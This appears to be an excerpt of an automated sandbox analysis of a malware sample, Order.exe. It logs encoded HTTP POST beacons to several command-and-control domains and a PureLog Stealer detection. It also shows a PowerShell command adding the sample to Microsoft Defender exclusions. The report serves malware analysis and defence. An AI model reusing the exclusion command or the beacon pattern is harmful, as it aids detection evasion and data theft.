                                                                                                                                  Data Ascii: kf-HBx=cI34pYOAGglcxS7uyLDRj4SmcxhlqXYH1DrJLILL3+l5quCg7E5xq2Rj+gprlmWhXNCk4u0naRr0MbOUzgB+T+ft+gB7fx9XhrreyP1xVXXMwAvA+7AV8TUXyh3RJV+E03atgwOMga8jvKtMthrZzbLyDXkh+s49eIi1T2d+xOHgvTCwk4GYdbuicECG7J1nFKOSHGxkJyvxbSGW41z7M3c=
                                                                                                                                   Oct 24, 2024 08:04:32.837163925 CEST | 407               | IN        | HTTP/1.1 301 Moved Permanently
                                                                                                                                  Content-Type: application/binary
                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                  Pragma: no-cache
                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                  Date: Thu, 24 Oct 2024 06:04:32 GMT
                                                                                                                                  Location: https://www.amitayush.digital/5ab9/
                                                                                                                                  Server: ESF
                                                                                                                                  Content-Length: 0
                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  Connection: close


                                                                                                                                   Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                                                                                                   43         | 192.168.2.4 | 50050       | 142.250.186.83  | 80               | 1376 | C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                   Timestamp                            | Bytes transferred | Direction | Data
                                                                                                                                   Oct 24, 2024 08:04:34.440768003 CEST | 10907             | OUT       | POST /5ab9/ HTTP/1.1
                                                                                                                                  Host: www.amitayush.digital
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.amitayush.digital
                                                                                                                                  Referer: http://www.amitayush.digital/5ab9/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 10303
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 63 49 33 34 70 59 4f 41 47 67 6c 63 78 53 37 75 79 4c 44 52 6a 34 53 6d 63 78 68 6c 71 58 59 48 31 44 72 4a 4c 49 4c 4c 33 2b 39 35 71 34 65 67 37 6e 52 78 72 32 52 6a 33 41 70 71 6c 6d 58 35 58 4e 36 37 34 75 34 64 61 54 6a 30 4f 34 57 55 6b 68 42 2b 45 75 66 74 7a 41 42 32 62 78 38 4e 68 71 48 61 79 4d 64 78 56 58 58 4d 77 46 72 41 75 65 30 56 73 6a 55 49 78 68 33 56 4e 56 2b 38 30 33 43 62 67 77 4b 6d 67 72 63 6a 76 72 64 4d 68 7a 7a 5a 72 4c 4c 77 43 6e 6b 35 2b 73 45 59 65 49 76 4f 54 33 35 55 78 4d 62 67 75 6e 50 52 78 5a 7a 42 42 74 75 4d 42 54 66 6b 33 75 45 2b 65 63 75 73 41 44 30 34 61 7a 4b 44 5a 51 6e 42 6c 46 54 4c 50 53 51 31 4c 69 63 48 57 33 45 76 69 46 75 66 4e 7a 44 77 49 48 64 6e 65 57 4c 59 57 58 62 4c 5a 71 49 56 59 73 36 4c 67 75 5a 59 2f 77 43 70 6c 6e 43 31 49 53 6c 64 79 67 36 30 73 4f 4a 32 70 58 5a 46 59 74 67 34 43 50 5a 61 62 38 66 2b 53 36 79 75 6d 6c 69 78 6a 73 63 59 43 71 45 48 77 4d 6f 4f 4f 50 49 5a 4f 4b 69 78 6f 6a 53 7a 55 36 56 4d 49 38 64 [TRUNCATED]
                                                                                                                                  Data Ascii: kf-HBx=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 [TRUNCATED]
                                                                                                                                   Oct 24, 2024 08:04:35.374715090 CEST | 407               | IN        | HTTP/1.1 301 Moved Permanently
                                                                                                                                  Content-Type: application/binary
                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                  Pragma: no-cache
                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                  Date: Thu, 24 Oct 2024 06:04:35 GMT
                                                                                                                                  Location: https://www.amitayush.digital/5ab9/
                                                                                                                                  Server: ESF
                                                                                                                                  Content-Length: 0
                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  Connection: close


                                                                                                                                   Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                                                                                                   44         | 192.168.2.4 | 50051       | 142.250.186.83  | 80               | 1376 | C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                   Timestamp                            | Bytes transferred | Direction | Data
                                                                                                                                   Oct 24, 2024 08:04:36.984633923 CEST | 526               | OUT       | GET /5ab9/?kf-HBx=RKfYqv7dLSd52zuxxJ7U+qX1dgM0j08UigLPO7fV9fYs6caX5nN0t2AmzQZhkSW6ZNnx9rwHNAGWB6es6Bp2HJzLwgFpIUBewc3Sq/1ccTai3Bmxrp0U6E4=&oFA=_z5x9B5 HTTP/1.1
                                                                                                                                  Host: www.amitayush.digital
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                   Oct 24, 2024 08:04:37.922194004 CEST | 549               | IN        | HTTP/1.1 301 Moved Permanently
                                                                                                                                  Content-Type: application/binary
                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                  Pragma: no-cache
                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                  Date: Thu, 24 Oct 2024 06:04:37 GMT
                                                                                                                                  Location: https://www.amitayush.digital/5ab9/?kf-HBx=RKfYqv7dLSd52zuxxJ7U+qX1dgM0j08UigLPO7fV9fYs6caX5nN0t2AmzQZhkSW6ZNnx9rwHNAGWB6es6Bp2HJzLwgFpIUBewc3Sq/1ccTai3Bmxrp0U6E4%3D&oFA=_z5x9B5
                                                                                                                                  Server: ESF
                                                                                                                                  Content-Length: 0
                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  Connection: close


                                                                                                                                   Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                                                                                                   45         | 192.168.2.4 | 50052       | 172.81.61.224   | 80               | 1376 | C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                   Timestamp                            | Bytes transferred | Direction | Data
                                                                                                                                   Oct 24, 2024 08:04:43.105602026 CEST | 799               | OUT       | POST /d5je/ HTTP/1.1
                                                                                                                                  Host: www.moritynomxd.xyz
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.moritynomxd.xyz
                                                                                                                                  Referer: http://www.moritynomxd.xyz/d5je/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 203
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 75 71 74 30 33 4c 50 77 67 7a 4b 47 53 31 39 6b 38 35 49 37 42 4c 67 65 42 63 71 7a 66 65 48 47 36 4d 6f 32 44 53 63 57 75 52 39 69 44 77 48 50 69 4a 35 4f 47 75 61 79 71 66 54 50 41 35 4d 67 49 58 45 45 79 42 67 6e 2f 4f 78 6f 63 4c 31 6d 35 66 52 2f 69 54 78 6a 70 44 4e 41 53 46 2f 43 74 51 77 4d 50 33 35 4c 49 4d 65 59 71 77 38 6d 57 71 65 72 64 61 7a 4c 4b 32 47 75 67 63 32 61 30 42 76 48 37 64 30 53 6d 65 36 6e 7a 4c 48 63 2b 48 4d 6d 4a 74 78 46 4d 6e 75 49 61 5a 47 5a 31 52 4a 4e 6c 51 7a 37 66 2f 72 66 61 62 59 44 33 46 58 68 67 44 52 47 42 6e 63 71 4a 35 72 64 50 41 3d 3d
                                                                                                                                  Data Ascii: kf-HBx=uqt03LPwgzKGS19k85I7BLgeBcqzfeHG6Mo2DScWuR9iDwHPiJ5OGuayqfTPA5MgIXEEyBgn/OxocL1m5fR/iTxjpDNASF/CtQwMP35LIMeYqw8mWqerdazLK2Gugc2a0BvH7d0Sme6nzLHc+HMmJtxFMnuIaZGZ1RJNlQz7f/rfabYD3FXhgDRGBncqJ5rdPA==


                                                                                                                                   Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                                                                                                   46         | 192.168.2.4 | 50053       | 172.81.61.224   | 80               | 1376 | C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                   Timestamp                            | Bytes transferred | Direction | Data
                                                                                                                                   Oct 24, 2024 08:04:45.653672934 CEST | 819               | OUT       | POST /d5je/ HTTP/1.1
                                                                                                                                  Host: www.moritynomxd.xyz
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.moritynomxd.xyz
                                                                                                                                  Referer: http://www.moritynomxd.xyz/d5je/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 223
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 75 71 74 30 33 4c 50 77 67 7a 4b 47 53 55 74 6b 36 65 6b 37 4a 4c 67 52 50 38 71 7a 52 2b 48 4b 36 4d 6b 32 44 51 77 34 75 43 4a 69 44 51 33 50 77 64 74 4f 44 75 61 79 2b 50 53 45 4f 5a 4d 72 49 58 34 4d 79 42 73 6e 2f 4f 6c 6f 63 4c 46 6d 36 6f 46 34 68 6a 78 68 79 7a 4e 43 66 6c 2f 43 74 51 77 4d 50 32 4a 78 49 4d 47 59 71 41 73 6d 52 2b 4b 73 54 36 7a 49 64 47 47 75 33 4d 32 47 30 42 76 6c 37 64 45 34 6d 63 79 6e 7a 4f 37 63 2b 54 59 68 51 64 78 48 52 58 76 70 4b 62 7a 58 79 54 55 56 73 67 2f 2f 66 73 66 35 62 64 4a 5a 6d 30 32 32 79 44 31 31 63 67 56 65 45 36 57 55 55 41 58 45 76 50 70 57 71 32 72 58 5a 4c 73 71 6a 56 65 4f 61 41 6f 3d
                                                                                                                                  Data Ascii: kf-HBx=uqt03LPwgzKGSUtk6ek7JLgRP8qzR+HK6Mk2DQw4uCJiDQ3PwdtODuay+PSEOZMrIX4MyBsn/OlocLFm6oF4hjxhyzNCfl/CtQwMP2JxIMGYqAsmR+KsT6zIdGGu3M2G0Bvl7dE4mcynzO7c+TYhQdxHRXvpKbzXyTUVsg//fsf5bdJZm022yD11cgVeE6WUUAXEvPpWq2rXZLsqjVeOaAo=


                                                                                                                                   Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                                                                                                   47         | 192.168.2.4 | 50054       | 172.81.61.224   | 80               | 1376 | C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                   Timestamp                            | Bytes transferred | Direction | Data
                                                                                                                                   Oct 24, 2024 08:04:48.360774040 CEST | 10901             | OUT       | POST /d5je/ HTTP/1.1
                                                                                                                                  Host: www.moritynomxd.xyz
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.moritynomxd.xyz
                                                                                                                                  Referer: http://www.moritynomxd.xyz/d5je/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 10303
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 75 71 74 30 33 4c 50 77 67 7a 4b 47 53 55 74 6b 36 65 6b 37 4a 4c 67 52 50 38 71 7a 52 2b 48 4b 36 4d 6b 32 44 51 77 34 75 43 52 69 44 6a 50 50 69 76 46 4f 41 75 61 79 69 2f 53 48 4f 5a 4d 32 49 54 55 49 79 42 77 33 2f 4e 64 6f 64 71 6c 6d 2f 63 70 34 32 7a 78 68 74 44 4e 48 53 46 2f 4c 74 51 67 49 50 33 31 78 49 4d 47 59 71 47 49 6d 48 36 65 73 44 4b 7a 4c 4b 32 47 79 67 63 32 36 30 42 33 55 37 5a 59 43 6d 4e 53 6e 79 75 4c 63 37 67 77 68 50 74 78 4a 51 58 76 4c 4b 62 76 63 79 54 59 5a 73 6a 6a 56 66 72 33 35 59 62 64 47 7a 57 32 68 6c 77 51 72 4c 78 39 69 63 4a 4c 53 62 41 2f 52 75 66 4a 2b 79 46 54 75 42 5a 46 46 2b 57 61 52 44 58 76 6b 4e 7a 56 64 51 50 50 38 51 34 65 48 34 78 50 4e 68 6c 46 76 37 43 49 77 6d 41 55 71 70 50 55 62 79 64 37 64 6f 56 2f 4f 48 67 35 63 69 6e 63 66 38 78 64 2f 49 46 41 59 2f 38 57 53 6b 36 2f 76 56 42 51 6d 52 2f 74 30 48 75 6e 32 5a 46 2b 73 48 63 38 79 54 75 7a 4f 4a 72 4f 61 74 4b 69 4c 32 76 51 4c 61 6c 70 45 30 53 66 39 4e 37 6d 47 6b 6a 73 [TRUNCATED]
                                                                                                                                  Data Ascii: kf-HBx=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 [TRUNCATED]


                                                                                                                                   Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                                                                                                   48         | 192.168.2.4 | 50055       | 172.81.61.224   | 80               | 1376 | C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                   Timestamp                            | Bytes transferred | Direction | Data
                                                                                                                                   Oct 24, 2024 08:04:50.909794092 CEST | 524               | OUT       | GET /d5je/?oFA=_z5x9B5&kf-HBx=joFU07nwohD6eVoe3rFlartiOObsWeCn1fIADxIG1iVHGQ+b2sFWG9fhj6bDMdYTFTYIwFceucpsU6xb3PR2iChOsBNMIjf68Qc2WylAI6LhtEtoF9GlVuo= HTTP/1.1
                                                                                                                                  Host: www.moritynomxd.xyz
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)


                                                                                                                                   Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                                                                                                   49         | 192.168.2.4 | 50056       | 3.33.130.190    | 80               | 1376 | C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                   Timestamp                            | Bytes transferred | Direction | Data
                                                                                                                                   Oct 24, 2024 08:04:56.458575964 CEST | 790               | OUT       | POST /h8b0/ HTTP/1.1
                                                                                                                                  Host: www.tukaari.shop
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.tukaari.shop
                                                                                                                                  Referer: http://www.tukaari.shop/h8b0/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 203
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 4f 54 6b 2b 7a 6d 4c 30 32 46 68 42 59 49 55 4b 2b 76 50 6b 6b 39 31 5a 54 70 75 34 47 62 58 56 30 44 55 34 4c 73 4b 69 57 4f 49 64 73 54 30 48 65 6a 75 69 62 72 50 4f 30 55 66 59 57 4e 37 72 4e 48 5a 36 72 35 30 66 63 62 35 63 73 67 2b 31 31 2b 62 69 32 54 68 58 6b 76 4f 4e 4c 68 51 64 78 69 49 78 36 46 63 4c 4b 79 66 62 6f 37 76 61 4b 76 50 42 61 32 45 53 39 56 4c 51 6d 69 7a 73 63 73 55 53 47 51 55 39 33 61 4c 66 79 72 51 36 4e 31 38 39 34 38 6d 35 44 37 6d 61 45 4a 7a 5a 76 41 73 32 6c 76 67 4a 4c 35 2f 6e 2b 51 52 41 4b 47 7a 59 2b 79 62 36 78 62 48 54 77 68 69 74 4e 67 3d 3d
                                                                                                                                  Data Ascii: kf-HBx=OTk+zmL02FhBYIUK+vPkk91ZTpu4GbXV0DU4LsKiWOIdsT0HejuibrPO0UfYWN7rNHZ6r50fcb5csg+11+bi2ThXkvONLhQdxiIx6FcLKyfbo7vaKvPBa2ES9VLQmizscsUSGQU93aLfyrQ6N18948m5D7maEJzZvAs2lvgJL5/n+QRAKGzY+yb6xbHTwhitNg==


Session ID:50
Source IP:192.168.2.4
Source Port:50057
Destination IP:3.33.130.190
Destination Port:80
PID:1376
Process:C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe

Timestamp:Oct 24, 2024 08:04:59.002609015 CEST
Bytes transferred:810
Direction:OUT
Data:POST /h8b0/ HTTP/1.1
                                                                                                                                  Host: www.tukaari.shop
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.tukaari.shop
                                                                                                                                  Referer: http://www.tukaari.shop/h8b0/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 223
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 4f 54 6b 2b 7a 6d 4c 30 32 46 68 42 4b 37 4d 4b 38 4d 6e 6b 6a 64 31 59 63 4a 75 34 54 4c 58 52 30 45 63 34 4c 74 66 36 56 38 63 64 73 79 6f 48 66 6d 53 69 63 72 50 4f 2f 30 66 6e 62 74 37 61 4e 48 55 48 72 37 51 66 63 59 46 63 73 6c 53 31 30 4e 7a 68 77 44 68 56 78 66 4f 54 47 42 51 64 78 69 49 78 36 47 67 78 4b 79 6e 62 6f 75 6e 61 59 39 33 47 5a 32 45 56 36 56 4c 51 73 43 7a 67 63 73 55 77 47 56 4e 57 33 63 48 66 79 71 67 36 4e 6b 38 38 74 73 6d 33 48 37 6e 7a 46 62 72 4a 72 54 64 56 69 39 73 31 45 34 4c 4d 79 32 41 61 62 33 53 50 73 79 2f 4a 73 63 4f 6e 39 69 66 6b 57 72 6d 6c 30 59 47 78 63 48 4a 46 64 52 76 68 79 53 33 69 66 48 6f 3d
                                                                                                                                  Data Ascii: kf-HBx=OTk+zmL02FhBK7MK8Mnkjd1YcJu4TLXR0Ec4Ltf6V8cdsyoHfmSicrPO/0fnbt7aNHUHr7QfcYFcslS10NzhwDhVxfOTGBQdxiIx6GgxKynbounaY93GZ2EV6VLQsCzgcsUwGVNW3cHfyqg6Nk88tsm3H7nzFbrJrTdVi9s1E4LMy2Aab3SPsy/JscOn9ifkWrml0YGxcHJFdRvhyS3ifHo=


Session ID:51
Source IP:192.168.2.4
Source Port:50058
Destination IP:3.33.130.190
Destination Port:80
PID:1376
Process:C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe

Timestamp:Oct 24, 2024 08:05:01.549972057 CEST
Bytes transferred:10892
Direction:OUT
Data:POST /h8b0/ HTTP/1.1
                                                                                                                                  Host: www.tukaari.shop
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.tukaari.shop
                                                                                                                                  Referer: http://www.tukaari.shop/h8b0/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 10303
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 4f 54 6b 2b 7a 6d 4c 30 32 46 68 42 4b 37 4d 4b 38 4d 6e 6b 6a 64 31 59 63 4a 75 34 54 4c 58 52 30 45 63 34 4c 74 66 36 56 38 45 64 73 67 67 48 65 42 47 69 64 72 50 4f 77 6b 66 6d 62 74 37 44 4e 44 77 4c 72 37 74 6f 63 65 42 63 71 33 61 31 6c 4d 7a 68 35 44 68 56 7a 66 4f 4f 4c 68 51 79 78 68 77 31 36 46 49 78 4b 79 6e 62 6f 70 58 61 49 66 50 47 55 57 45 53 39 56 4b 52 6d 69 7a 4d 63 6f 41 4b 47 56 41 74 30 73 6e 66 79 4b 77 36 50 57 55 38 73 4d 6d 31 4b 62 6e 72 46 62 57 4f 72 54 52 6a 69 38 59 62 45 34 2f 4d 6a 52 35 34 41 33 4f 72 2b 69 6a 30 2b 4f 43 66 38 41 50 53 59 63 53 45 79 62 53 32 4b 6e 30 75 47 41 57 65 76 48 76 39 42 78 6b 70 54 67 37 37 49 41 42 59 73 6e 68 44 4c 42 55 70 6d 33 55 69 35 43 78 4c 79 74 68 76 44 32 69 4b 79 64 52 78 66 4b 61 4c 42 36 61 4d 35 75 32 74 6f 34 56 71 4f 74 41 45 31 6f 68 76 55 49 43 7a 67 69 64 44 39 6d 41 6f 66 58 78 6c 4c 47 71 6e 52 6b 42 75 58 71 61 69 7a 53 75 64 45 4a 7a 49 46 35 77 42 37 48 69 5a 64 71 6d 5a 38 37 74 62 41 4d 35 [TRUNCATED]
Data Ascii: kf-HBx= [TRUNCATED]


Session ID:52
Source IP:192.168.2.4
Source Port:50059
Destination IP:3.33.130.190
Destination Port:80
PID:1376
Process:C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe

Timestamp:Oct 24, 2024 08:05:04.308687925 CEST
Bytes transferred:521
Direction:OUT
Data:GET /h8b0/?kf-HBx=DRMewQ2K/nAxApdAjdq/8MBaTrmuK5PhjAtlDuz9ScYe9TdKczyHToKl/nXwUp75CTxdtMRmJbFDzl6M6vndpjQD4u+ERF0y3CIErlIFDiiN/rGNNtD3azo=&oFA=_z5x9B5 HTTP/1.1
                                                                                                                                  Host: www.tukaari.shop
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)

Timestamp:Oct 24, 2024 08:05:04.937974930 CEST
Bytes transferred:394
Direction:IN
Data:HTTP/1.1 200 OK
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Thu, 24 Oct 2024 06:05:04 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 254
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6b 66 2d 48 42 78 3d 44 52 4d 65 77 51 32 4b 2f 6e 41 78 41 70 64 41 6a 64 71 2f 38 4d 42 61 54 72 6d 75 4b 35 50 68 6a 41 74 6c 44 75 7a 39 53 63 59 65 39 54 64 4b 63 7a 79 48 54 6f 4b 6c 2f 6e 58 77 55 70 37 35 43 54 78 64 74 4d 52 6d 4a 62 46 44 7a 6c 36 4d 36 76 6e 64 70 6a 51 44 34 75 2b 45 52 46 30 79 33 43 49 45 72 6c 49 46 44 69 69 4e 2f 72 47 4e 4e 74 44 33 61 7a 6f 3d 26 6f 46 41 3d 5f 7a 35 78 39 42 35 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?kf-HBx=DRMewQ2K/nAxApdAjdq/8MBaTrmuK5PhjAtlDuz9ScYe9TdKczyHToKl/nXwUp75CTxdtMRmJbFDzl6M6vndpjQD4u+ERF0y3CIErlIFDiiN/rGNNtD3azo=&oFA=_z5x9B5"}</script></head></html>


                                                                                                                                  Target ID:0
                                                                                                                                  Start time:02:00:57
                                                                                                                                  Start date:24/10/2024
                                                                                                                                  Path:C:\Users\user\Desktop\Order.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\Desktop\Order.exe"
                                                                                                                                  Imagebase:0x530000
                                                                                                                                  File size:814'592 bytes
                                                                                                                                  MD5 hash:879BFDCA45455CFE5B122B8AD287B393
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1745771597.0000000005130000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1740687497.0000000003A39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  Reputation:low
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:2
                                                                                                                                  Start time:02:01:03
                                                                                                                                  Start date:24/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order.exe"
